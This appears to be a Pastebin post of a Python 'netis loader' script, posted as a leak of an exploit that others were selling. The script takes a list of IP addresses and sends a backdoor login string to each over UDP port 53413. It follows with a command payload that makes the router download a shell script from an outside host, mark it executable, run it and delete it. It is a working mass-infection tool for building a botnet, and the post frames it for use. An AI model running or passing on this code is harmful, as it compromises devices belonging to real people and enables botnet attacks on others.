IRunYourModerm

[ Python ] Netis Exploit | STOP SELLING IT

Apr 13th, 2019
298
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.33 KB | None | 0 0
  1. //Decided to leak this exploit since everyone still sells it and makes money of it..
  2. //If you decide to edit any of this dont forget to leave credits to the creater. :)
  3.  
  4. #!/usr/bin/python
  5.  
  6. # netis loader
  7.  
  8.  
  9.  
  10.  
  11. import threading, sys, time, random, socket, re, os
  12.  
  13.  
  14.  
  15. if len(sys.argv) < 2:
  16.  
  17.         print "Usage: python "+sys.argv[0]+" <list>"
  18.  
  19.         sys.exit()
  20.  
  21.  
  22.  
  23. loginpayload = "AAAAAAAAnetcore\x00"
  24.  
  25. commandpayload = "AA\x00\x00AAAA cd /tmp; wget http://1.1.1.1/bins.sh ; chmod 777 bins.sh ; ./bins.sh ; rm -rf bins.sh"
  26.  
  27. list = open(sys.argv[1], "r").readlines()
  28.  
  29. offline = 0
  30.  
  31. class netis(threading.Thread):
  32.  
  33.         def __init__ (self, ip):
  34.  
  35.             threading.Thread.__init__(self)
  36.  
  37.             self.ip = str(ip).rstrip('\n')
  38.  
  39.         def run(self):
  40.  
  41.             s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  42.  
  43.             try:
  44.  
  45.                 print "\033[31m[\033[32m+\033[31m] \033[32mAttempting:\033[32m %s"%(self.ip)
  46.  
  47.                 s.sendto(loginpayload, (self.ip, 53413))
  48.  
  49.                 time.sleep(1.5)
  50.  
  51.                 s.sendto(commandpayload, (self.ip, 53413))
  52.  
  53.                 time.sleep(30)
  54.  
  55.             except Exception:
  56.  
  57.                 pass
  58.  
  59. for ip in list:
  60.  
  61.     try:
  62.  
  63.         t = netis(ip)
  64.  
  65.         t.start()
  66.  
  67.         time.sleep(0.01)
  68.  
  69.     except:
  70.  
  71.         pass
Advertisement
Add Comment
Please, Sign In to add comment